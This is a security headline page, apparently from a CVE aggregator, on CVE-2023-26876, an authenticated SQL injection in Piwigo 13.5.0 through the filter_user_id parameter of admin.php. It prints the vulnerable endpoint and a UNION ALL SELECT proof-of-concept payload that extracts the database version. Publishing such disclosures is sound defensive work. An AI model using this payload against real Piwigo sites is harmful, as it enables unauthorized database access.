Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-26876: POC - Authenticated SQL injection Piwigo 13.5.0 - CVE-2023-26876

SQL injection vulnerability found in Piwigo v.13.5.0 and before allows a remote attacker to execute arbitrary code via the filter_user_id parameter to the admin.php?page=history&filter_image_id=&filter_user_id endpoint.

CVE
Open in Source
#sql#vulnerability#php#auth

POC - Authenticated SQL injection Piwigo 13.5.0

Payload: 12 UNION ALL SELECT CONCAT(0x4141414141,IFNULL(CAST(VERSION() AS NCHAR),0x20),0x4141414141)-- –

Related news

Piwigo 13.5.0 SQL Injection

Piwigo version 13.5.0 suffers from a remote SQL injection vulnerability.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE